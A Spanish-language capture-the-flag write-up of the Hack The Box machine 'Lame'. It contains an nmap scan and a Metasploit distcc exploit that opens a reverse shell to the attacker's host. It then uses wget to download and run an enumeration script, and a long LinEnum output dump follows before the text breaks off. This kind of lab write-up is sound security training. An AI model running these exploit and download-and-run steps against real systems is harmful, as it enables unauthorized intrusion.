__ _____ _____ _____ _ _____
| | | _ | ___| _ |___| | |_|_ _|___
| |__| | | _| |_ -| | | | | | .'|
|_____|__|__| |___|__|__|___|__|__|_| |_| |__,|
hola@lacashita.com
[HTB] Lame
Hoy vamos a hackear la maquina de HTB llamada Lame.
Esta catalogada como facil.
Enumeration
Para empezar hacemos un nmap para ver que puertos tiene abiertos.
sml@m0nikE:~$ nmap -A -p- -Pn 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-02 14:52 CET
Nmap scan report for 10.10.10.3
Host is up (0.043s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.6
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.32 seconds
Vemos que hay varios puertos abiertos, y el mas "exotico" es el 3632
que corresponde al servicio de distccd, asi que tras buscar, vemos que
existe un exploit para este servicio.
Exploitation
Configuramos metasploit para usar un exploit contra distccd.
msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > show options
Module options (exploit/unix/misc/distcc_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR
identifier, or hosts file with syntax 'file:
'
RPORT 3632 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf5 exploit(unix/misc/distcc_exec) > exploit
[*] Started reverse TCP double handler on 10.10.14.6:4444
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo GtxuzicNJZBxaR0k;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "GtxuzicNJZBxaR0k\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.6:4444 -> 10.10.10.3:55000) at
2019-11-02 15:00:50 +0100
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
user.txt
Ya tenemos una shell con pocos privilegios.
Buscamos la flag de user.txt.
sh-3.2$ pwd
/home
sh-3.2$ ls
ftp makis service user
sh-3.2$ cd makis
cd makis
sh-3.2$ ls
user.txt
sh-3.2$ cat user.txt
69454a937d94f5f0225ea00acd2e8XXX
Privilege Escalation
Descargamos un script para enumerar la maquina.
sh-3.2$ cd /tmp
sh-3.2$ wget http://10.10.14.6/lin.sh
wget http://10.10.14.6/lin.sh
--07:09:14-- http://10.10.14.6/lin.sh
=> `lin.sh'
Connecting to 10.10.14.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45,657 (45K) [application/octet-stream]
0% [ ] 0 --.--K/s
100%[====================================>] 45,657 --.--K/s
07:09:14 (550.32 KB/s) - `lin.sh' saved [45657/45657]
Una vez descargado, lo ejecutamos para analizar el resultado.
sh-3.2$ sh lin
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.971
[-] Debug Info
[+] Thorough tests = Disabled
Scan started at:
Wed Oct 30 07:09:19 EDT 2019
### SYSTEM ##############################################
[-] Kernel information:
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
[-] Kernel information (continued):
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu
4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008
[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"
[-] Hostname:
lame
### USER/GROUP ##########################################
[-] Current user/group info:
uid=1(daemon) gid=1(daemon) groups=1(daemon)
[-] Users that have previously logged onto the system:
Username Port From Latest
root pts/0 :0.0 Wed Oct 30 06:53:10 -0400 2019
makis pts/1 192.168.150.100 Tue Mar 14 18:32:04 -0400 2017
[-] Who else is logged on:
07:09:19 up 16 min, 1 user, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 :0.0 06:53 16:09m 0.00s 0.00s -bash
[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(dhcp) gid=102(dhcp) groups=102(dhcp)
uid=102(syslog) gid=103(syslog) groups=103(syslog)
uid=103(klog) gid=104(klog) groups=104(klog)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(bind) gid=113(bind) groups=113(bind)
uid=106(postfix) gid=115(postfix) groups=115(postfix)
uid=107(ftp) gid=65534(nogroup) groups=65534(nogroup)
uid=108(postgres) gid=117(postgres) groups=117(postgres),114(ssl-cert)
uid=109(mysql) gid=118(mysql) groups=118(mysql)
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
uid=111(distccd) gid=65534(nogroup) groups=65534(nogroup)
uid=1002(service) gid=1002(service) groups=1002(service)
uid=112(telnetd) gid=120(telnetd) groups=120(telnetd),43(utmp)
uid=113(proftpd) gid=65534(nogroup) groups=65534(nogroup)
uid=114(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=115(snmp) gid=65534(nogroup) groups=65534(nogroup)
uid=1003(makis) gid=1003(makis) groups=1003(makis),4(adm),112(admin)
[-] It looks like we have some admin users:
uid=1003(makis) gid=1003(makis) groups=1003(makis),4(adm),112(admin)
[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
makis:x:1003:1003::/home/makis:/bin/sh
[-] Super user account(s):
root
[+] We can sudo without supplying a password!
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
{-i | -s | }
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...
[-] Accounts that have recently used sudo:
/home/makis/.sudo_as_admin_successful
[+] We can read root's home directory!
total 80K
drwxr-xr-x 13 root root 4.0K Oct 30 06:53 .
drwxr-xr-x 21 root root 4.0K May 20 2012 ..
-rw------- 1 root root 373 Oct 30 06:53 .Xauthority
lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null
-rw-r--r-- 1 root root 2.2K Oct 20 2007 .bashrc
drwx------ 3 root root 4.0K May 20 2012 .config
drwx------ 2 root root 4.0K May 20 2012 .filezilla
drwxr-xr-x 5 root root 4.0K Oct 30 06:53 .fluxbox
drwx------ 2 root root 4.0K May 20 2012 .gconf
drwx------ 2 root root 4.0K May 20 2012 .gconfd
drwxr-xr-x 2 root root 4.0K May 20 2012 .gstreamer-0.10
drwx------ 4 root root 4.0K May 20 2012 .mozilla
-rw-r--r-- 1 root root 141 Oct 20 2007 .profile
drwx------ 5 root root 4.0K May 20 2012 .purple
-rwx------ 1 root root 4 May 20 2012 .rhosts
drwxr-xr-x 2 root root 4.0K May 20 2012 .ssh
drwx------ 2 root root 4.0K Oct 30 06:53 .vnc
drwxr-xr-x 2 root root 4.0K May 20 2012 Desktop
-rwx------ 1 root root 401 May 20 2012 reset_logs.sh
-rw------- 1 root root 33 Mar 14 2017 root.txt
-rw-r--r-- 1 root root 118 Oct 30 06:53 vnc.log
[-] Are permissions on /home directories lax:
total 24K
drwxr-xr-x 6 root root 4.0K Mar 14 2017 .
drwxr-xr-x 21 root root 4.0K May 20 2012 ..
drwxr-xr-x 2 root nogroup 4.0K Mar 17 2010 ftp
drwxr-xr-x 2 makis makis 4.0K Mar 14 2017 makis
drwxr-xr-x 2 service service 4.0K Apr 16 2010 service
drwxr-xr-x 3 1001 1001 4.0K May 7 2010 user
[-] Root is allowed to login via SSH:
PermitRootLogin yes
### ENVIRONMENTAL #######################################
[-] Environment information:
_DISTCC_SAFEGUARD=1
TERM=linux
QUIET=no
PATH=/sbin:/bin:/usr/sbin:/usr/bin
runlevel=2
RUNLEVEL=2
UPSTART_EVENT=runlevel
PWD=/tmp
VERBOSE=no
previous=N
PREVLEVEL=N
SHLVL=7
UPSTART_JOB=rc2
UPSTART_JOB_ID=5
_=/usr/bin/env
[-] Path information:
/sbin:/bin:/usr/sbin:/usr/bin
[-] Available shells:
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen
[-] Current umask value:
u=rwx,g=rx,o=rx
0022
[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 724 Apr 8 2008 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x 2 root root 4096 May 14 2012 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
-rw-r--r-- 1 root root 492 Jan 6 2010 php5
-rw-r--r-- 1 root root 1323 Mar 31 2008 postgresql-common
/etc/cron.daily:
total 60
drwxr-xr-x 2 root root 4096 Apr 28 2010 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
-rwxr-xr-x 1 root root 633 Feb 1 2008 apache2
-rwxr-xr-x 1 root root 7441 Apr 22 2008 apt
-rwxr-xr-x 1 root root 314 Apr 4 2008 aptitude
-rwxr-xr-x 1 root root 502 Dec 12 2007 bsdmainutils
-rwxr-xr-x 1 root root 89 Jun 19 2006 logrotate
-rwxr-xr-x 1 root root 954 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 183 Mar 8 2008 mlocate
-rwxr-xr-x 1 root root 383 Apr 28 2010 samba
-rwxr-xr-x 1 root root 3295 Apr 8 2008 standard
-rwxr-xr-x 1 root root 1309 Nov 23 2007 sysklogd
-rwxr-xr-x 1 root root 477 Dec 7 2008 tomcat55
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Mar 16 2010 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
/etc/cron.monthly:
total 20
drwxr-xr-x 2 root root 4096 Apr 28 2010 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
-rwxr-xr-x 1 root root 664 Feb 20 2008 proftpd
-rwxr-xr-x 1 root root 129 Apr 8 2008 standard
/etc/cron.weekly:
total 24
drwxr-xr-x 2 root root 4096 Mar 16 2010 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r-- 1 root root 102 Apr 8 2008 .placeholder
-rwxr-xr-x 1 root root 528 Mar 12 2008 man-db
-rwxr-xr-x 1 root root 2522 Jan 28 2008 popularity-contest
-rwxr-xr-x 1 root root 1220 Nov 23 2007 sysklogd
[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts
--report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts
--report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts
--report /etc/cron.monthly )
#
### NETWORKING ##########################################
[-] Network and IP info:
eth0 Link encap:Ethernet HWaddr 00:50:56:b9:86:fb
inet addr:10.10.10.3 Bcast:10.10.10.255 Mask:255.255.255.0
inet6 addr: dead:beef::250:56ff:feb9:86fb/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:86fb/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:134051 errors:0 dropped:0 overruns:0 frame:0
TX packets:635 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:9969857 (9.5 MB) TX bytes:75030 (73.2 KB)
Interrupt:19 Base address:0x2000
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:229 errors:0 dropped:0 overruns:0 frame:0
TX packets:229 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:87089 (85.0 KB) TX bytes:87089 (85.0 KB)
[-] ARP history:
? (10.10.10.2) at 00:50:56:B9:B5:67 [ether] on eth0
[-] Nameserver(s):
nameserver 10.10.10.2
[-] Default route:
default 10.10.10.2 0.0.0.0 UG 100 0 0 eth0
[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
PID/Program name
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:50086 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:46150 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:48910 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
-
tcp 0 0 10.10.10.3:53 0.0.0.0:* LISTEN
-
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN
-
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN
-
tcp 0 0 0.0.0.0:45246 0.0.0.0:* LISTEN
-
tcp6 0 0 :::2121 :::* LISTEN
-
tcp6 0 0 :::3632 :::* LISTEN
-
tcp6 0 0 :::53 :::* LISTEN
-
tcp6 0 0 :::22 :::* LISTEN
-
tcp6 0 0 :::5432 :::* LISTEN
-
tcp6 0 0 ::1:953 :::* LISTEN
-
[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State
PID/Program name
udp 0 0 0.0.0.0:2049 0.0.0.0:*
-
udp 0 0 10.10.10.3:137 0.0.0.0:*
-
udp 0 0 0.0.0.0:137 0.0.0.0:*
-
udp 0 0 10.10.10.3:138 0.0.0.0:*
-
udp 0 0 0.0.0.0:138 0.0.0.0:*
-
udp 0 0 0.0.0.0:58001 0.0.0.0:*
-
udp 0 0 0.0.0.0:49939 0.0.0.0:*
-
udp 0 0 127.0.0.1:161 0.0.0.0:*
-
udp 0 0 0.0.0.0:54187 0.0.0.0:*
-
udp 0 0 10.10.10.3:53 0.0.0.0:*
-
udp 0 0 127.0.0.1:53 0.0.0.0:*
-
udp 0 0 0.0.0.0:33468 0.0.0.0:*
-
udp 0 0 0.0.0.0:69 0.0.0.0:*
-
udp 0 0 0.0.0.0:111 0.0.0.0:*
-
udp 0 0 0.0.0.0:1018 0.0.0.0:*
-
udp6 0 0 :::53 :::*
-
udp6 0 0 :::44491 :::*
-
### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.3 2844 1692 ? Ss 06:52 0:00 /sbin/init
root 2 0.0 0.0 0 0 ? S< 06:52 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 06:52 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< 06:52 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 06:52 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 06:52 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 06:52 0:00 [khelper]
root 41 0.0 0.0 0 0 ? S< 06:52 0:00 [kblockd/0]
root 64 0.0 0.0 0 0 ? S< 06:52 0:00 [kseriod]
root 181 0.0 0.0 0 0 ? S 06:52 0:00 [pdflush]
root 182 0.0 0.0 0 0 ? S 06:52 0:00 [pdflush]
root 183 0.0 0.0 0 0 ? S< 06:52 0:00 [kswapd0]
root 224 0.0 0.0 0 0 ? S< 06:52 0:00 [aio/0]
root 1244 0.0 0.0 0 0 ? S< 06:52 0:00 [ksnapd]
root 1433 0.0 0.0 0 0 ? S< 06:52 0:00 [ata/0]
root 1436 0.0 0.0 0 0 ? S< 06:52 0:00 [ata_aux]
root 1445 0.0 0.0 0 0 ? S< 06:52 0:00 [scsi_eh_0]
root 1449 0.0 0.0 0 0 ? S< 06:52 0:00 [scsi_eh_1]
root 1462 0.0 0.0 0 0 ? S< 06:52 0:00 [ksuspend_usbd]
root 1466 0.0 0.0 0 0 ? S< 06:52 0:00 [khubd]
root 2330 0.0 0.0 0 0 ? S< 06:52 0:00 [scsi_eh_2]
root 2513 0.0 0.0 0 0 ? S< 06:52 0:00 [kjournald]
root 2688 0.0 0.1 2216 648 ? S< 06:52 0:00 /sbin/udevd
--daemon
root 3057 0.0 0.0 0 0 ? S< 06:52 0:00 [kpsmoused]
root 3997 0.0 0.0 0 0 ? S< 06:52 0:00 [kjournald]
daemon 4216 0.0 0.1 1836 524 ? Ss 06:52 0:00 /sbin/portmap
statd 4234 0.0 0.1 1900 724 ? Ss 06:52 0:00 /sbin/rpc.statd
root 4240 0.0 0.0 0 0 ? S< 06:52 0:00 [rpciod/0]
root 4255 0.0 0.1 3648 560 ? Ss 06:52 0:00
/usr/sbin/rpc.idmapd
root 4482 0.0 0.0 1716 492 tty4 Ss+ 06:52 0:00 /sbin/getty
38400 tty4
root 4484 0.0 0.0 1716 484 tty5 Ss+ 06:52 0:00 /sbin/getty
38400 tty5
root 4490 0.0 0.0 1716 488 tty2 Ss+ 06:52 0:00 /sbin/getty
38400 tty2
root 4494 0.0 0.0 1716 488 tty3 Ss+ 06:52 0:00 /sbin/getty
38400 tty3
root 4497 0.0 0.0 1716 492 tty6 Ss+ 06:52 0:00 /sbin/getty
38400 tty6
syslog 4533 0.0 0.1 1936 648 ? Ss 06:52 0:00 /sbin/syslogd
-u syslog
root 4584 0.0 0.1 1872 544 ? S 06:52 0:00 /bin/dd bs 1
if /proc/kmsg of /var/run/klogd/kmsg
klog 4586 0.0 0.4 3288 2120 ? Ss 06:52 0:00 /sbin/klogd -P
/var/run/klogd/kmsg
bind 4611 0.0 1.4 35408 7680 ? Ssl 06:52 0:00
/usr/sbin/named -u bind
root 4635 0.0 0.1 5312 1024 ? Ss 06:52 0:00 /usr/sbin/sshd
root 4716 0.0 0.2 2768 1304 ? S 06:52 0:00 /bin/sh
/usr/bin/mysqld_safe
mysql 4758 0.0 3.3 127560 17024 ? Sl 06:52 0:00
/usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql
--pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306
--socket=/var/run/mysqld/mysqld.sock
root 4760 0.0 0.1 1700 560 ? S 06:52 0:00 logger -p
daemon.err -t mysqld_safe -i -t mysqld
postgres 4839 0.0 0.9 41340 5068 ? S 06:52 0:00
/usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c
config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres 4843 0.0 0.2 41340 1376 ? Ss 06:52 0:00 postgres:
writer process
postgres 4844 0.0 0.2 41340 1188 ? Ss 06:52 0:00 postgres: wal
writer process
postgres 4845 0.0 0.2 41476 1404 ? Ss 06:52 0:00 postgres:
autovacuum launcher process
postgres 4846 0.0 0.2 12660 1152 ? Ss 06:52 0:00 postgres:
stats collector process
daemon 4866 0.0 0.0 2316 424 ? SNs 06:52 0:00 distccd
--daemon --user daemon --allow 0.0.0.0/0
daemon 4867 0.0 0.1 2316 556 ? SN 06:52 0:00 distccd
--daemon --user daemon --allow 0.0.0.0/0
root 4921 0.0 0.0 0 0 ? S 06:52 0:00 [lockd]
root 4922 0.0 0.0 0 0 ? S< 06:52 0:00 [nfsd4]
root 4923 0.0 0.0 0 0 ? S 06:52 0:00 [nfsd]
root 4924 0.0 0.0 0 0 ? S 06:52 0:00 [nfsd]
root 4925 0.0 0.0 0 0 ? S 06:52 0:00 [nfsd]
root 4926 0.0 0.0 0 0 ? S 06:52 0:00 [nfsd]
root 4927 0.0 0.0 0 0 ? S 06:52 0:00 [nfsd]
root 4928 0.0 0.0 0 0 ? S 06:52 0:00 [nfsd]
root 4929 0.0 0.0 0 0 ? S 06:52 0:00 [nfsd]
root 4930 0.0 0.0 0 0 ? S 06:52 0:00 [nfsd]
root 4934 0.0 0.0 2424 328 ? Ss 06:52 0:00
/usr/sbin/rpc.mountd
root 5002 0.0 0.3 5412 1724 ? Ss 06:52 0:00
/usr/lib/postfix/master
postfix 5003 0.0 0.3 5420 1644 ? S 06:52 0:00 pickup -l -t
fifo -u -c
postfix 5006 0.0 0.3 5460 1684 ? S 06:52 0:00 qmgr -l -t
fifo -u
root 5010 0.0 0.2 5388 1192 ? Ss 06:52 0:00 /usr/sbin/nmbd
-D
root 5012 0.0 0.2 7724 1476 ? Ss 06:52 0:00 /usr/sbin/smbd
-D
root 5016 0.0 0.1 7724 808 ? S 06:52 0:00 /usr/sbin/smbd
-D
snmp 5018 0.0 0.7 8488 3760 ? S 06:52 0:00
/usr/sbin/snmpd -Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid
127.0.0.1
root 5033 0.0 0.1 2424 864 ? Ss 06:52 0:00
/usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
daemon 5078 0.0 0.1 2316 560 ? SN 06:52 0:00 distccd
--daemon --user daemon --allow 0.0.0.0/0
daemon 5079 0.0 0.0 2316 216 ? SN 06:52 0:00 distccd
--daemon --user daemon --allow 0.0.0.0/0
proftpd 5081 0.0 0.3 9948 1596 ? Ss 06:53 0:00 proftpd:
(accepting connections)
daemon 5097 0.0 0.0 1984 420 ? Ss 06:53 0:00 /usr/sbin/atd
root 5110 0.0 0.1 2104 900 ? Ss 06:53 0:00 /usr/sbin/cron
root 5140 0.0 0.0 2052 352 ? Ss 06:53 0:00 /usr/bin/jsvc
-user tomcat55 -cp
/usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar
-outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid
-Djava.awt.headless=true -Xmx128M
-Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed
-Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5
-Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager
-Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy
org.apache.catalina.startup.Bootstrap
root 5141 0.0 0.0 2052 480 ? S 06:53 0:00 /usr/bin/jsvc
-user tomcat55 -cp
/usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar
-outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid
-Djava.awt.headless=true -Xmx128M
-Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed
-Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5
-Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager
-Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy
org.apache.catalina.startup.Bootstrap
tomcat55 5143 1.4 17.3 363988 89308 ? Sl 06:53 0:14 /usr/bin/jsvc
-user tomcat55 -cp
/usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar
-outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid
-Djava.awt.headless=true -Xmx128M
-Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed
-Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5
-Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager
-Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy
org.apache.catalina.startup.Bootstrap
root 5163 0.0 0.4 10596 2556 ? Ss 06:53 0:00
/usr/sbin/apache2 -k start
www-data 5164 0.0 0.3 10596 1948 ? S 06:53 0:00
/usr/sbin/apache2 -k start
www-data 5166 0.0 0.3 10596 1948 ? S 06:53 0:00
/usr/sbin/apache2 -k start
www-data 5168 0.0 0.3 10596 1948 ? S 06:53 0:00
/usr/sbin/apache2 -k start
www-data 5171 0.0 0.3 10596 1948 ? S 06:53 0:00
/usr/sbin/apache2 -k start
